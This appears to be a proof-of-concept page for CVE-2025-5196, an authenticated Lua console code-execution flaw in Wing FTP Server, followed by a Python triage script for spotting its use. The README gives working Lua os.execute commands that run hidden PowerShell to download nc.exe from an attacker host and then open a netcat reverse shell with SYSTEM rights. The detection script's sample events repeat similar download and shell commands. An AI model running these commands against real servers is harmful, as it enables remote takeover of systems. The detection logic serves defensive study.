CVE-2025-5196 PoC — Wing FTP Server Lua Admin Console unnecessary privileges

Associated Vulnerability
Title: Wing FTP Server Lua Admin Console unnecessary privileges (CVE-2025-5196)
Description: A vulnerability has been found in Wing FTP Server up to 7.4.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Lua Admin Console. The manipulation leads to execution with unnecessary privileges. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 7.4.4 is able to address this issue. It is recommended to upgrade the affected component. The vendor explains: "[W]e do not consider it as a security vulnerability, because the system admin in WingFTP has full permissions [...], but you can suggest the user run WingFTP service as Normal User rather than SYSTEM/Root, it will be safer."
Description
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing. CVE-2025-5196
Readme
# Wing FTP Server 7.4.4 - Remote Code Execution (Authenticated) (CVE-2025-5196)
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.

Affected Version: Wing FTP Server 7.4.4 (Windows) | Authentication Required: Yes

---

# Download & Release Notes
As of May 24, 2025, the latest version of the application provided by the vendor is available at: https://www.wftpserver.com/download.htm

As of the same date, the vendor's release notes state that the RCE vulnerability has been fixed in version 7.4.4. The release notes are available here: https://www.wftpserver.com/serverhistory.htm
![image](https://github.com/user-attachments/assets/6c012118-50d8-4698-9378-8eef746c4708)

---

# PoC
PoC related to CVE-2025-5196 [VulDB](https://vuldb.com/?id.310279)
![image](https://github.com/user-attachments/assets/f35ef4d9-fd4a-4a5f-ab50-d1b9bf5bb3b3)

Wing FTP Server Web Interface

![image](https://github.com/user-attachments/assets/36426432-9ba6-4f00-8599-2dd9dffc876b)

![image](https://github.com/user-attachments/assets/9b316062-448d-45f5-8988-c98bbf950ce0)

The first part of the command downloads nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part executes `nc.exe 192.168.234.131 4443 -e cmd.exe`.
```
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
```
```
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
```
![image](https://github.com/user-attachments/assets/c6aaac7b-bdca-4d1a-baaf-cc4a14c56cc7)

NT/SYSTEM Shell
![image](https://github.com/user-attachments/assets/a8efd159-0153-4304-9438-7ae3b27ce258)
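
On the detection side, both commands above leave the same footprint: a command interpreter started as a child of the FTP service process. The triage sketch below is an added example, not part of the original README or the vendor's code; the service image name `WFTPServer.exe`, the event field names and the sample events are assumptions constructed for illustration.

```python
import re
# Assumption: the service binary is WFTPServer.exe; adjust to the local install.
SERVICE_IMAGES = {"wftpserver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PRIVILEGED_USERS = {"NT AUTHORITY\\SYSTEM", "ROOT"}
# Command-line traits taken from the two os.execute calls in the README.
TRAITS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-exec(utionpolicy)?\s+bypass", re.I),
    "web_download": re.compile(r"downloadfile|invoke-webrequest", re.I),
    "shell_handoff": re.compile(r"-e\W+cmd\.exe", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return finding names for one process-creation event ([] = ignore)."""
    # Lua's os.execute goes through the C runtime's system(), so on Windows
    # the direct child of the service is the command interpreter.
    if (basename(event["parent_image"]) not in SERVICE_IMAGES
            or basename(event["image"]) not in SHELLS):
        return []
    findings = ["shell_child_of_ftp_service"]
    findings += [n for n, rx in TRAITS.items() if rx.search(event["command_line"])]
    if event["user"].upper() in PRIVILEGED_USERS:
        findings.append("service_runs_privileged")
    return findings

# Constructed sample events (field names are hypothetical, Sysmon-like).
SVC = r"C:\Program Files\Wing FTP Server\WFTPServer.exe"  # constructed path
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"parent_image": SVC, "image": CMD, "user": "NT AUTHORITY\\SYSTEM",
     "command_line": "cmd.exe /c powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
                     "\"(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/t.exe', 'C:\\Temp\\t.exe')\""},
    {"parent_image": SVC, "image": CMD, "user": "NT AUTHORITY\\SYSTEM",
     "command_line": r"cmd.exe /c powershell -NoP -W Hidden -Command "
                     r"Start-Process C:\Temp\t.exe -ArgumentList 192.0.2.10,4443,-e,cmd.exe"},
    {"parent_image": SVC, "image": CMD, "user": "LAB\\wingftp",
     "command_line": "cmd.exe /c dir"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": CMD, "user": "LAB\\alice",
     "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["user"], triage(ev))
```

The third sample event shows the vendor's suggested configuration (service running as a normal user): the shell child is still reported, but without the `service_runs_privileged` finding.
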
File Snapshot

```
[4.0K] /data/pocs/ab4ebd7a6c2611d4253f927156e85285571d007c
├── [ 475] poc.txt
└── [2.0K] README.md

0 directories, 2 files
```